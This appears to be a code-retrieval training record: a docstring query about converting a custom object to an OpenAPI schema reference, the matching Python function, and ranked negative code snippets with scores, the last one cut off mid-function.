str_to_type(name_type):\n if name_type == 'float' or name_type == 'Float':\n return float\n if name_type == 'bool':\n return bool\n if name_type == 'int':\n return lambda x: int(float(x))\n if name_type == 'list':\n return ast.literal_eval\n if name_type == 'date':\n return lambda x: dateutil.parser.parse(x).strftime('%Y-%m-%dT%H:%M:%SZ')\n if name_type == 'str':\n return str\n\n \n return None" ]
[ "0.5762772", "0.56126136", "0.5612374", "0.5606245", "0.5510904", "0.5498231", "0.54389805", "0.5416661", "0.5379599", "0.53538597", "0.5281033", "0.52633864", "0.522637", "0.51833683", "0.5179722", "0.5152138", "0.51198363", "0.51118517", "0.50726426", "0.5072116", "0.5070442", "0.50484437", "0.5038657", "0.50124013", "0.49934113", "0.495798", "0.4947225", "0.49403617", "0.49176028", "0.49140236" ]
0.74992687
0
Convert a custom object to a schema. This is done by create a reference to the object. Any nonreference object should be created by the Components builder. param `obj` must be a subtype of `data_types.Component`. Its type will determine what kind of component it is, e.g. '/components/ schemas/...' or '/components/parameters/...'.
def convert_objects_to_schema(obj: Type[Component]) -> ReferenceObject: cmp_type: str = 'schemas' # default component type if hasattr(obj, '__cmp_type__'): cmp_type = obj.__cmp_type__.lower() # type: ignore return create_reference(obj.__name__, cmp_type)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_schema(obj):\n\n if not isinstance(obj, Schema):\n if isinstance(obj, dict):\n return DictStructure(obj)\n elif isinstance(obj, list):\n return ListStructure(obj)\n elif isinstance(obj, (int, float, str, bool)) or (obj is None):\n return Value(obj)\n else:\n raise ValueError(f\"object {obj} cannot be represented as a JSON Structure\")\n else:\n return obj", "def object_hook(self, obj: Any) -> Any:\n if '__type__' in obj:\n if obj['__type__'] == 'complex':\n val = obj['__value__']\n return val[0] + 1j * val[1]\n if obj['__type__'] == 'array':\n return np.array(obj['__value__'])\n if obj['__type__'] == 'result':\n return Result.from_dict(obj['__value__'])\n if obj['__type__'] == 'to_json':\n return obj['__value__']\n if obj['__type__'] == 'dill':\n decoded = base64.standard_b64decode(obj['__value__'])\n return dill.loads(decoded)\n return obj", "def mkcomponent(self,\n context=[],\n componentobj=None):\n if componentobj == None:\n raise ValueError, \"mkcomponent: componentobj is None\"\n return jsoncall.do_call(\"mkcomponent\", {'modelname':self.modelname,\\\n 'user':self.user,\\\n 'password':self.password,\\\n 'context':context,\\\n 'componentobj':componentobj.__dict__},\n self.connection)", "def __init__(self, obj):\n if isinstance(obj, str):\n # The schema given is some kind of handle which we try to open\n self.data = self._get_schema_content(obj)\n else:\n self.data = obj", "def fromObject(cls, obj, decode=None):\n if obj.__doc__ is None:\n return cls(u'' if decode else '')\n r = cls.fromString(obj.__doc__, decode=decode)\n return r", "def from_object(cls, obj, base_rule=None):\n if isinstance(obj, dict):\n return cls.from_dict(obj, base_rule=base_rule)\n elif isinstance(obj, Iterable):\n return cls.from_iterable(obj, base_rule=base_rule)\n else:\n raise ValueError('Cannot build {0} from {1}'.format(cls, type(obj)))", "def coerce_type(cls, obj, typedef=None, **kwargs):\n if trimesh and isinstance(obj, trimesh.base.Trimesh):\n obj = ObjDict.from_trimesh(obj)\n if isinstance(obj, dict) and ('material' in obj):\n obj['material'] = tools.bytes2str(obj['material'])\n return super(ObjMetaschemaType, cls).coerce_type(\n obj, typedef=typedef, **kwargs)", "def from_obj(self, obj):\n self.__obj = obj\n self.__obj.swagger_types = self.swagger_types\n self.__obj.swagger_map = self.swagger_map", "def parse_obj(obj: ObjectType) -> bytes:\n if isinstance(obj, PDFObject):\n return parse_obj(obj.value)\n elif isinstance(obj, PDFRef):\n return obj.ref\n elif isinstance(obj, dict):\n if '__stream__' in obj:\n return parse_stream(obj)\n else:\n return parse_dict(obj)\n elif isinstance(obj, (list, tuple, set)):\n return parse_list(obj)\n elif isinstance(obj, bytes):\n return obj\n elif isinstance(obj, bool):\n return b'true' if obj else b'false'\n elif isinstance(obj, (int, float)):\n return str(obj).encode('latin')\n elif isinstance(obj, str):\n return ('(' + re.sub(r'([()])', r'\\\\\\1', obj) + ')').encode('latin')", "def build(self, obj):\n if isinstance(obj, self.art_type):\n return obj\n elif isinstance(obj, (tuple, list, dict, set)):\n if obj.__class__ is tuple:\n return self.build_tuple(obj)\n elif obj.__class__ is dict:\n return self.build_dict(obj)\n elif obj.__class__ is list:\n return self.build_list(obj)\n else:\n return self.build_set(obj)\n elif isinstance(obj, SageObject):\n return self.build_from_magic_method(obj)\n else:\n return self.build_from_string(obj)", "def fromObj(self, obj):\n for k in BaseNode.SERIALIZABLE_PROPERTIES:\n if k in obj:\n # work around for migrate nodeInfo class\n if k == \"nodeInfo\":\n if isinstance(obj[k], dict):\n obj[k] = NodeInfo(obj[k][\"showInputs\"], obj[k][\"showOutputs\"], obj[k]\n [\"showLabel\"], obj[k][\"showBorder\"], obj[k][\"fill\"], obj[k][\"useNodeFont\"])\n\n setattr(self, k, obj[k])", "def make(obj):\n if isinstance(obj, dict):\n if isinstance(obj, Struct):\n ObjType = type(obj)\n else:\n ObjType = Struct\n return ObjType(**{k: Struct.make(v) for k, v in obj.items()})\n\n elif isinstance(obj, list):\n return [Struct.make(v) for v in obj]\n\n return obj", "def do(self, obj):\n if isinstance(obj, str):\n return 'st__' + obj\n\n if type(obj) in literals:\n return obj\n\n # Now check for list, set, and tuple, and skip if they don't contain\n # any non-literals\n if type(obj) in builtin_iterables:\n if all(isinstance(x, literals) for x in flattened(obj)):\n return as_nested_lists(obj)\n\n oid = id(obj)\n if oid in self._working:\n raise GlueSerializeError(\"Circular reference detected\")\n self._working.add(oid)\n\n fun, version = self._dispatch(obj)\n logging.debug(\"Serializing %s with %s\", obj, fun)\n result = fun(obj, self)\n\n if isinstance(obj, types.FunctionType):\n result['_type'] = 'types.FunctionType'\n elif isinstance(obj, types.MethodType):\n result['_type'] = 'types.MethodType'\n else:\n result['_type'] = \"%s.%s\" % (type(obj).__module__,\n type(obj).__name__)\n if version > 1:\n result['_protocol'] = version\n\n self._working.remove(oid)\n return result", "def from_obj(cls, obj: any) -> Objdict:\n # CASE: list. Convert each item in the list.\n if isinstance(obj, list):\n value = [cls.from_obj(item) for item in obj]\n\n # CASE: dictionary. Convert each item in the dictionary.\n elif isinstance(obj, dict):\n d = {k: cls.from_obj(v) for k, v in obj.items()}\n value = cls(**d)\n\n # CASE: basic number or string. Use the item \"as is\"\n elif (\n isinstance(obj, str)\n or isinstance(obj, Number)\n or isinstance(obj, date)\n or obj is None\n ):\n value = obj\n\n # CASE: object with an internal dictionary. Treat like a dictionary.\n elif hasattr(obj, \"__dict__\"):\n value = cls.from_obj(obj.__dict__)\n\n # OTHERWISE: we need to figure it out.\n else:\n raise DocumentException(f\"Objdict.from_dict: can't convert value {obj}\")\n\n return value", "def fl_get_object_component(ptr_flobject, flobjclass, compontype, seqnum):\n _fl_get_object_component = library.cfuncproto(\n library.load_so_libforms(), \"fl_get_object_component\",\n cty.POINTER(xfdata.FL_OBJECT), [cty.POINTER(xfdata.FL_OBJECT),\n cty.c_int, cty.c_int, cty.c_int], \\\n \"\"\"FL_OBJECT * fl_get_object_component(FL_OBJECT * composite,\n int objclass, int type, int numb)\"\"\")\n library.check_if_flinitialized()\n library.verify_flobjectptr_type(ptr_flobject)\n i_flobjclass = library.convert_to_intc(flobjclass)\n i_compontype = library.convert_to_intc(compontype)\n i_seqnum = library.convert_to_intc(seqnum)\n library.keep_elem_refs(ptr_flobject, flobjclass, i_flobjclass, \\\n compontype, i_compontype, seqnum, i_seqnum)\n retval = _fl_get_object_component(ptr_flobject, i_flobjclass, \\\n i_compontype, i_seqnum)\n return retval", "def _from_object(cls, context, obj):\n kwargs = {\n 'id': obj.id,\n 'enabled': obj.enabled,\n 'data': obj.data,\n 'last_op': obj.last_op,\n 'priority': obj.priority,\n\n # derived data\n 'cluster_name': obj.cluster.name,\n 'policy_name': obj.policy.name,\n 'policy_type': obj.policy.type,\n }\n\n return cls(obj.cluster_id, obj.policy_id, context=context, **kwargs)", "def convert_to_references(obj):\n if isinstance(obj, BaseReferenceResource):\n if hasattr(obj, 'id') and not obj.id:\n logger.warning('Id missing for object ' + str(obj.__dict__) + '.\\nFMC may fail to resolve this reference.')\n converted_obj = ReferenceType(obj)\n elif isinstance(obj, list) or isinstance(obj, tuple) or isinstance(obj, set):\n new_list = type(obj)()\n for item in obj:\n if isinstance(obj, set):\n new_list.add(convert_to_references(item))\n else:\n new_list.append(convert_to_references(item))\n converted_obj = new_list\n elif isinstance(obj, dict):\n new_dict = {}\n for key, converted_obj in obj.items():\n new_dict[key] = convert_to_references(converted_obj)\n converted_obj = new_dict\n elif obj and isinstance(obj, object) and hasattr(obj, '__dict__'):\n converted_obj = convert_to_references(obj.__dict__)\n else:\n converted_obj = obj\n return converted_obj", "def register(self, obj):\r\n name = obj._component_name\r\n if name in self.components:\r\n raise ComponentAlreadyRegistered(\"Component already registered with name %s\" % name)\r\n\r\n self.components[obj._component_name] = obj", "def dump(self, obj, context=None):\n return self.schema_class(context=context).dump(obj).data", "def get_object_type(schema_obj):\n\n if isinstance(schema_obj, schema.Field):\n raise exception.InvalidArgument(schema_obj)\n return schema_obj.full_name", "def _get_schema_from_object(self, data):\n if \"items\" in data:\n return self._get_schema_from_object(data[\"items\"])\n\n url_key = None\n\n if '$id' in data:\n url_key = '$id'\n\n if 'id' in data:\n url_key = 'id'\n\n if url_key:\n url = data[url_key]\n schema = Schema().build()\n schema.domain_entity = self.get_domain_entity_from_url(url)\n schema.high_level_entity = self.get_high_level_entity_from_url(url)\n schema.module = self.get_module_from_url(url)\n schema.url = url\n return schema\n\n return None", "def deserialize(self, obj):\n raise NotImplementedError", "def to_field(obj):\r\n\r\n\r\n if isinstance(obj, Field):\r\n field = obj\r\n else:\r\n d = { \"storage_type\": \"unknown\" }\r\n\r\n if isinstance(obj, basestring):\r\n d[\"name\"] = obj\r\n elif type(obj) == tuple or type(obj) == list:\r\n d[\"name\"] = obj[0]\r\n try:\r\n d[\"storage_type\"] = obj[1]\r\n try:\r\n d[\"analytical_type\"] = obj[2]\r\n except:\r\n pass\r\n except:\r\n pass\r\n else: # assume dictionary\r\n d[\"name\"] = obj[\"name\"]\r\n d[\"label\"] = obj.get(\"label\")\r\n d[\"storage_type\"] = obj.get(\"storage_type\")\r\n d[\"analytical_type\"] = obj.get(\"analytical_type\")\r\n d[\"adapter_storage_type\"] = obj.get(\"adapter_storage_type\")\r\n\r\n if \"analytical_type\" not in d:\r\n storage_type = d.get(\"storage_type\")\r\n if storage_type:\r\n deftype = default_analytical_types.get(storage_type)\r\n d[\"analytical_type\"] = deftype or \"typeless\"\r\n else:\r\n d[\"analytical_type\"] = \"typeless\"\r\n\r\n field = Field(**d)\r\n return field", "def init_obj(obj_name):\n ret = type(obj_name, (object,), {})\n return ret", "def from_object(cls, obj):\n if any(p is obj for p in obj.params):\n raise ValueError(\n f\"Cannot create a Function from a parameter object. This parameter {obj._name!r} \"\n \"is like an argument to a function---not the body of the function itself.\"\n )\n\n named_args = {p._name: getattr(p, \"_proxytype\", type(p)) for p in obj.params}\n # ^ if any of the params are widgets (likely), use their base Proxytype in the Function type signature:\n # a Function[Checkbox, Slider, ...] would be 1) weird and 2) not serializeable.\n concrete_function_type = cls[named_args, type(obj)]\n\n graft = client.function_graft(obj, *(p.graft for p in obj.params))\n # TODO we should probably store `obj.params` somewhere---that's valuable metadata maybe\n # to show the function as widgets, etc?\n return concrete_function_type._from_graft(graft)", "def normalize_to_ref(tobject, tobject_ref):\n\n _new_tobject = asrootpy(tobject.Clone())\n if tobject.integral():\n _factor = float(tobject_ref.integral()) / float(tobject.integral())\n\n return _new_tobject * _factor\n else:\n return _new_tobject", "def generate_parser_obj(obj, *, default_type=None):\n parser = argparse.ArgumentParser(\n prog=obj.__name__,\n # Modules tend to have very long docstrings...\n description=inspect.cleandoc(obj.__doc__).splitlines()[0] if obj.__doc__ else None\n )\n # Dest is suppressed by default. Set it to a value that no parameter name can take.\n subparsers = parser.add_subparsers(dest='{command}')\n # Due to a stupid bug, subparsers are optional by default.\n subparsers.required = True\n\n def functions(obj):\n return tuple([o[1] for o in inspect.getmembers(obj) if inspect.isfunction(o[1])])\n\n for func in functions(obj):\n thisparser = subparsers.add_parser(\n func.__name__,\n description=inspect.cleandoc(func.__doc__) if func.__doc__ else None\n )\n generate_parser(func, thisparser, default_type=default_type)\n # Save a reference for obj2cli to call if this subparser is used.\n thisparser.set_defaults(**{'{func}':func})\n\n return parser", "def bundle_instance(obj):\n\n content, contents = osl_encode(obj, True)\n # should be a bunch of documents, not just one.\n bundle = [json.dumps(c) for c in contents]\n return bundle", "def from_dto(cls, obj):\n if obj is None:\n return None\n\n if not hasattr(obj, '_data'):\n return None\n\n new_model = cls()\n\n for key in obj._data:\n if key == 'transcripts':\n setattr(new_model, key, [DTOConverter.from_dto(Transcript, t) for t in obj._data[key]])\n elif key == 'acts' and cls == Transcript:\n setattr(new_model, key, [DTOConverter.from_dto(Act, a) for a in obj._data[key]])\n elif key == 'subtitles':\n setattr(new_model, key, [DTOConverter.from_dto(Subtitle, s) for s in obj._data[key]])\n else:\n if key != 'id':\n setattr(new_model, key, obj._data[key])\n\n return new_model", "def to_base(self, obj):\n if hasattr(obj, \"to_base\"):\n return obj.to_base()\n return obj" ]
[ "0.6243453", "0.5825912", "0.57944256", "0.57603896", "0.56610686", "0.5654507", "0.5639352", "0.5597519", "0.5585299", "0.5489156", "0.5368194", "0.53657424", "0.5364657", "0.5353328", "0.5295786", "0.5216217", "0.5193709", "0.516745", "0.51386046", "0.5135405", "0.5110169", "0.50898105", "0.5063764", "0.50441045", "0.50145745", "0.50011015", "0.49532762", "0.49450698", "0.49389306", "0.493456" ]
0.81769264
0
'Inject' the `Component` class into the custom, user defined, soontobe Component, class. This will help when building a property that involves a user defined custom Component. param `cmp_type` is some subtype of `data_types.Component`, e.g. whether it is a Schema component or Parameter component.
def inject_component(cls, cmp_type: Type[ComponentType]): if issubclass(cls, Component): return cls else: injected = type( "Injected", (cls, cmp_type), {attr_name: attr for attr_name, attr in cls.__dict__.items()} ) injected.__qualname__ = f'Component[{cls.__name__}]' # Make sure not to override name, because it will be # used in the conversion to an Open API object, e.g. # {__name__: <rest of properties>}. injected.__name__ = cls.__name__ injected.__cmp_type__ = cmp_type.__name__ # type: ignore return injected
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_comp(self, name, ctype):\n\n name = self.name + '.' + name\n\n assert name not in self.components, 'A component named \\'{}\\' already exists for node \\'{}\\''.format(\n name, self.name)\n\n try:\n cls = co.str_to_comp(ctype)\n except AttributeError:\n try:\n cls = rc.str_to_comp(ctype)\n except AttributeError:\n cls = None\n\n if cls:\n obj = cls(name=name,\n temperature_driven=self.temperature_driven,\n repr_days=self.repr_days)\n else:\n raise ValueError(\n \"%s is not a valid class name! (component is %s, in node %s)\" % (\n ctype, name, self.name))\n\n self.logger.info('Component {} added to {}'.format(name, self.name))\n\n self.components[name] = obj", "def __init__(self, component):\r\n self.component = component", "def __init__(self, component):\r\n self.component = component", "def registerType(cls, type):\n # NOTE Subclasses must be registered via this method in order to be initialized from XML, etc.\n cls.componentTypes[type.__name__] = type\n #print \"Component.registerType(): Component type \\'\" + type.__name__ + \"\\' registered.\" # [debug]", "def createappendcomp(self, componentname, componentclass, *args, **kwargs):\n component = componentclass(self, self.debugmode, *args, **kwargs)\n self.components.append(componentname, component)\n return component", "def TypedComponentLoader(ComponentLoader):\n def __init__(self, portal_type):\n self._portal_type = portal_type\n \n def __call__(self, reference, version=None):\n return ComponentLoader.__call__(self._portal_type, reference, version=version)\n\n def __getattr__(self, key):\n if key.startswith('_'):\n return self.__dict__[key]\n return self(key)", "def test_component_arg(thing):\n\n class HelloThing(Component):\n def __init__(self, thing: str):\n self.thing = thing\n\n template = \"\"\"\n hello, <<self.thing>>!\"\"\"\n\n assert snippet_eval(ComponentSnippet(HelloThing(thing))) == f\"hello, {thing}!\\n\"", "def add_component(self, lib_component):\n comp_name = lib_component.name\n try:\n comp = self.__component_list[comp_name]\n except KeyError:\n self.__component_list[comp_name] = lib_component", "def load(\n cls,\n component_config: Dict[Text, Any],\n model_dir: Optional[Text] = None,\n model_metadata: Optional[\"Metadata\"] = None,\n cached_component: Optional[\"Component\"] = None,\n **kwargs: Any,\n ) -> \"Component\":\n if cached_component:\n return cached_component\n else:\n return cls(component_config)", "def register_component(var, config):\n id_ = text_type(var.base)\n if id_ not in CORE.component_ids:\n raise ValueError(u\"Component ID {} was not declared to inherit from Component, \"\n u\"or was registered twice. Please create a bug report with your \"\n u\"configuration.\".format(id_))\n CORE.component_ids.remove(id_)\n if CONF_SETUP_PRIORITY in config:\n add(var.set_setup_priority(config[CONF_SETUP_PRIORITY]))\n if CONF_UPDATE_INTERVAL in config:\n add(var.set_update_interval(config[CONF_UPDATE_INTERVAL]))\n add(App.register_component(var))\n yield var", "def create_component_instance(step, category, component_type=None, is_advanced=False):\r\n assert_in(category, ['problem', 'html', 'video', 'discussion'])\r\n\r\n component_button_css = 'span.large-{}-icon'.format(category.lower())\r\n if category == 'problem':\r\n module_css = 'div.xmodule_CapaModule'\r\n else:\r\n module_css = 'div.xmodule_{}Module'.format(category.title())\r\n\r\n # Count how many of that module is on the page. Later we will\r\n # assert that one more was added.\r\n # We need to use world.browser.find_by_css instead of world.css_find\r\n # because it's ok if there are currently zero of them.\r\n module_count_before = len(world.browser.find_by_css(module_css))\r\n\r\n # Disable the jquery animation for the transition to the menus.\r\n world.disable_jquery_animations()\r\n world.css_click(component_button_css)\r\n\r\n if category in ('problem', 'html'):\r\n world.wait_for_invisible(component_button_css)\r\n click_component_from_menu(category, component_type, is_advanced)\r\n\r\n expected_count = module_count_before + 1\r\n world.wait_for(\r\n lambda _: len(world.css_find(module_css)) == expected_count,\r\n timeout=20\r\n )", "def component_type(self, component_type):\n allowed_values = [\"CONNECTION\", \"PROCESSOR\", \"PROCESS_GROUP\", \"REMOTE_PROCESS_GROUP\", \"INPUT_PORT\", \"OUTPUT_PORT\", \"REMOTE_INPUT_PORT\", \"REMOTE_OUTPUT_PORT\", \"FUNNEL\", \"LABEL\", \"CONTROLLER_SERVICE\", \"REPORTING_TASK\", \"PARAMETER_CONTEXT\", \"PARAMETER_PROVIDER\", \"TEMPLATE\", \"FLOW_REGISTRY_CLIENT\"]\n if component_type not in allowed_values:\n raise ValueError(\n \"Invalid value for `component_type` ({0}), must be one of {1}\"\n .format(component_type, allowed_values)\n )\n\n self._component_type = component_type", "def cog_component(\n *,\n messages: typing.Union[int, discord.Message, list] = None,\n components: typing.Union[str, dict, list] = None,\n use_callback_name=True,\n component_type: int = None,\n):\n message_ids = list(get_messages_ids(messages)) if messages is not None else [None]\n custom_ids = list(get_components_ids(components)) if components is not None else [None]\n\n def wrapper(callback):\n nonlocal custom_ids\n\n if use_callback_name and custom_ids == [None]:\n custom_ids = [callback.__name__]\n\n if message_ids == [None] and custom_ids == [None]:\n raise IncorrectFormat(\"You must specify messages or components (or both)\")\n\n return CogComponentCallbackObject(\n callback,\n message_ids=message_ids,\n custom_ids=custom_ids,\n component_type=component_type,\n )\n\n return wrapper", "def make_component(self, name=\"Face\") -> 'Component':\n return BRepComponent(self.brep, component=self.component, name=name)", "def load(\n cls,\n meta: Dict[Text, Any],\n model_dir: Optional[Text] = None,\n model_metadata: Optional[\"Metadata\"] = None,\n cached_component: Optional[\"Component\"] = None,\n **kwargs: Any,\n ) -> \"Component\":\n\n if cached_component:\n return cached_component\n else:\n return cls(meta)", "def load(\n cls,\n meta: Dict[Text, Any],\n model_dir: Optional[Text] = None,\n model_metadata: Optional[\"Metadata\"] = None,\n cached_component: Optional[\"Component\"] = None,\n **kwargs: Any,\n ) -> \"Component\":\n\n if cached_component:\n return cached_component\n else:\n return cls(meta)", "def use(self, compo_type):\n self.compo_type = compo_type", "def load(\n cls,\n meta: Dict[Text, Any],\n model_dir: Optional[Text] = None,\n model_metadata: Optional[\"Metadata\"] = None,\n cached_component: Optional[\"Component\"] = None,\n **kwargs: Any,\n ) -> \"Component\":\n\n if cached_component:\n return cached_component\n\n return cls(meta)", "def create_component_instantiation(custom_components, template):\n built_string = \"\"\n for custom_component in custom_components:\n built_string += template.add_custom_component_instantiaion(\n custom_component)\n return built_string", "def of_json(json: JSON) -> 'ComponentView':\n\n cls = Class.of_json(json)\n\n if LangChainComponent.class_is(cls):\n return LangChainComponent.of_json(json)\n elif LlamaIndexComponent.class_is(cls):\n return LlamaIndexComponent.of_json(json)\n elif TrulensComponent.class_is(cls):\n return TrulensComponent.of_json(json)\n else:\n raise TypeError(f\"Unhandled component type with class {cls}\")", "def add_component(self, new: components.Component) -> None:\n for existing in self.components:\n if isinstance(existing, type(new)):\n raise Exception(type(new))\n self.components.append(new)", "def create_new_component(self, cname):\n while True:\n try:\n self.model.get_component_by_name(cname)\n cname += u'_'\n except KeyError:\n # Component with this name doesn't exist\n break\n # Create the component\n comp = cellml_component.create_new(self.model, cname)\n self.model._add_component(comp)\n return comp", "def component(self, component):\n\n self._component = component", "def component(self, component):\n\n self._component = component", "def add_component(self, param):\n if param.name in self.components:\n raise Exception('The network already has a parameter \"%s\"!'\n % param.name)\n self.components[param.name] = param", "def add_component(self, componentInstance):\n\n #print \"Componet being added to %s entity.\"%(self._sName)\n #print componentInstance\n \n self._dComponents[componentInstance.get_name()] = componentInstance\n\n #These if statements will save a pointer of the same variable as in dComponents if True.\n\n if componentInstance.get_updateable():\n self._lUpdatables.append(componentInstance)\n\n if componentInstance.is_view_drawable():\n self._lViewDrawables.append(componentInstance)\n\n elif componentInstance.is_screen_drawable():\n self._lScreenDrawables.append(componentInstance)", "def _load_component(self, name):\n cls = None\n if self.mapping and name in self.mapping:\n cls = self.mapping[name]\n elif \".\" in name:\n cls = self._import(*name.rsplit(\".\", 1))\n else:\n for base in self.bases:\n if self.module:\n mod = base\n else:\n mod = \"%s.%s\" % (base, name)\n cls = self._import(mod, name)\n if cls is not None:\n break\n if cls:\n get_parser().add_component(cls)\n elif not self.fail_silently:\n raise OptionParserException(\"Could not load component %s\" % name)\n return cls", "def _set_component_type_params(self, component_type):\n self.component_type = component_type\n\n if component_type == \"healpix\":\n self._name.required = False\n self._skycoord.required = False\n self._hpx_inds.required = True\n self._nside.required = True\n self._hpx_order.required = True\n self._hpx_frame.required = True\n else:\n self._name.required = True\n self._skycoord.required = True\n self._hpx_inds.required = False\n self._nside.required = False\n self._hpx_order.required = False\n self._hpx_frame.required = False", "def setComponent(self, *args):\n return _libsbml.SpeciesTypeComponentIndex_setComponent(self, *args)", "def create(\n cls, component_config: Dict[Text, Any], config: DazuConfig\n ) -> \"Component\":\n\n # Check language supporting\n language = config.language\n if not cls.can_handle_language(language):\n # check failed\n raise UnsupportedLanguageError(cls.name, language)\n\n return cls(component_config)" ]
[ "0.6341976", "0.60763973", "0.60763973", "0.5894654", "0.5816849", "0.5718252", "0.56145835", "0.56028533", "0.5554072", "0.55418164", "0.5510925", "0.54735297", "0.54278535", "0.5406879", "0.5326886", "0.5326886", "0.5322498", "0.52880853", "0.518145", "0.51773274", "0.51618105", "0.515665", "0.5146011", "0.5146011", "0.5142499", "0.51353246", "0.5109745", "0.50896114", "0.5074385", "0.5055582" ]
0.7875679
0
Determine all of the local ip addresses for this machine This allows us to flag traffic as inbound or outbound.
def detect_local_ips(self): result = set() for ifaceName in interfaces(): try: address = [i['addr'] for i in ifaddresses(ifaceName)[AF_INET]] except: pass result.add(address[0]) return tuple(result)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_ips():\r\n local_ips = []\r\n public_ips = []\r\n \r\n # list of iface names, 'lo0', 'eth0', etc.\r\n for iface in netifaces.interfaces():\r\n # list of ipv4 addrinfo dicts\r\n ipv4s = netifaces.ifaddresses(iface).get(netifaces.AF_INET, [])\r\n for entry in ipv4s:\r\n addr = entry.get('addr')\r\n #print(\"addr: \" + addr)\r\n if not addr:\r\n continue\r\n if not (iface.startswith('lo') or addr.startswith('127.')):\r\n public_ips.append(addr)\r\n else:\r\n local_ips.append(addr) \r\n return public_ips", "def local_bind_addresses(self):\n self._check_is_started()\n return [_server.local_address for _server in self._server_list]", "def get_local_address_range(self):\n return str(self.min_local_ip), str(self.max_local_ip)", "def local_ip():\n sys_name = system()\n if sys_name == 'Darwin':\n # OSX\n route = Command('route')\n ifconfig = Command('ifconfig')\n\n iface = [\n line.strip()\n for line in route('-n', 'get', 'default')\n if line.strip().startswith('interface')\n ][0].split(':')[1].strip()\n return [\n line.strip()\n for line in ifconfig(iface)\n if line.strip().startswith('inet ')\n ][0].split(' ')[1]\n elif sys_name == 'Linux':\n try:\n ip = Command('ip')\n iface = [\n line.strip()\n for line in ip('route')\n if line.strip().startswith('default ')\n ][0].split(' ')[4]\n except CommandNotFound:\n route = Command('route')\n iface = [\n line.strip()\n for line in route('-n')\n if line.startswith('0.0.0.0')\n ][0].split(' ').pop()\n\n try:\n # try with IP\n ip = Command('ip')\n return [\n line.strip()\n for line in ip('addr', 'show', iface)\n if line.strip().startswith('inet ')\n ][0].split(' ')[1].split('/')[0]\n except CommandNotFound:\n pass\n\n # fallback to ifconfig\n ifconfig = Command('ifconfig')\n return [\n line.strip()\n for line in ifconfig(iface)\n if line.strip().startswith('inet ')\n ][0].split(' ')[1]\n\n return None", "def ip_addresses(self):\n try:\n return socket.gethostbyaddr(self.fqdn)[-1]\n except socket.error as _:\n return ['127.0.0.1']", "def localip(self) :\n\t\ttry :\n\t\t\treturn self._localip\n\t\texcept Exception as e:\n\t\t\traise e", "def neighbors_ip(self):\n neighbors = self.neighbors()\n nei_list = []\n net_ip = self._rloc_ip_net_addr()\n if neighbors is not None:\n for nei_rec in neighbors:\n nei_ip = net_ip + hex(nei_rec.rloc16)[2:]\n nei_list.append(nei_ip)\n return nei_list", "def inetVisibleIP(self):\n def handle(results):\n ips = [ result[1][0] for result in results if result[0] ]\n self.log.debug(\"other nodes think our ip is %s\" % str(ips))\n return ips\n\n ds = []\n for neighbor in self.bootstrappableNeighbors():\n ds.append(self.protocol.stun(neighbor))\n d = defer.gatherResults(ds)\n d.addCallback(handle)\n d.addErrback(self.onError)\n return d", "def _update_ips(self):\n self.ip_others = []\n ips = self.mesh.ipaddr()\n self.rloc16 = self.mesh.rloc()\n for line in ips:\n if line.startswith('fd'):\n # Mesh-Local unicast IPv6\n try:\n addr = int(line.split(':')[-1], 16)\n except Exception:\n continue\n if addr == self.rloc16:\n # found RLOC\n # RLOC IPv6 has x:x:x:x:0:ff:fe00:RLOC16\n self.rloc = line\n elif ':0:ff:fe00:' not in line:\n # found Mesh-Local EID\n self.ip_eid = line\n elif line.startswith('fe80'):\n # Link-Local\n self.ip_link = line\n else:\n self.ip_others.append(line)", "def public_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"public_ip_addresses\")", "def ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IpMappingArgs']]]]:\n return pulumi.get(self, \"ip_addresses\")", "def public_ip_addresses(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"public_ip_addresses\")", "def network_interfaces():\n try:\n command = which('ipadm')\n args = ('show-addr', '-p', '-o', 'STATE,ADDR')\n pattern = r'ok:(\\d+\\.\\d+\\.\\d+\\.\\d+)'\n except CommandMissing:\n # Fall back to old command on old solaris releases.\n command = which('/usr/sbin/ifconfig')\n args = ('-a')\n pattern = r'inet (\\d+\\.\\d+\\.\\d+\\.\\d+)'\n addrs = []\n output = sh(command, *args)\n for line in output:\n match = re.match(pattern, line)\n if match:\n addr = match.group(1)\n if not addr.startswith(\"127.\"):\n addrs.append(addr)\n return addrs", "def get_all_ips_connection(self):\n return self.m_connection.all_ips", "def remote_route(self):\r\n proxy = self.environ.get('HTTP_X_FORWARDED_FOR')\r\n if proxy: return [ip.strip() for ip in proxy.split(',')]\r\n remote = self.environ.get('REMOTE_ADDR')\r\n return [remote] if remote else []", "def get_floating_ips(self):\n return self.router.get(l3_constants.FLOATINGIP_KEY, [])", "def local_bind_ports(self):\n self._check_is_started()\n return [_server.local_port for _server in self._server_list if\n _server.local_port is not None]", "def get_ip_address_filter(self):\n return self.mycam.devicemgmt.GetIPAddressFilter()", "def _init_ipaddress_ops(self):\n\n # retrieve local and external IPs\n all_ips_str = set(self.statistics.process_db_query(\"all(ipAddress)\", print_results=False))\n # external_ips_str = set(self.statistics.process_db_query(\"ipAddress(macAddress=%s)\" % self.get_probable_router_mac(), print_results=False)) # including router\n # local_ips_str = all_ips_str - external_ips_str\n external_ips = set()\n local_ips = set()\n all_ips = set()\n\n self.contains_priv_ips = False\n self.priv_ip_segment = None\n\n # convert IP strings to IPv4.IPAddress representation\n for ip in all_ips_str:\n if is_ipv4(ip):\n ip = IPAddress.parse(ip)\n # exclude local broadcast address and other special addresses\n if (not str(ip) == \"255.255.255.255\") and (not ip.is_localhost()) and (not ip.is_multicast()) and (\n not ip.is_reserved()) and (not ip.is_zero_conf()):\n all_ips.add(ip)\n\n for ip in all_ips:\n if ip.is_private():\n local_ips.add(ip)\n\n external_ips = all_ips - local_ips\n\n # save the certain unused local IPs of the network\n # to do that, divide the unused local Addressspace into chunks of (chunks_size) Addresses\n # initally only the first chunk will be used, but more chunks can be added to the pool of unused_local_ips if needed\n self.min_local_ip, self.max_local_ip = min(local_ips), max(local_ips)\n local_ip_range = (self.max_local_ip.to_int()) - (self.min_local_ip.to_int() + 1)\n if local_ip_range < 0:\n # for min,max pairs like (1,1), (1,2) there is no free address in between, but for (1,1) local_ip_range may be -1, because 1-(1+1)=-1\n 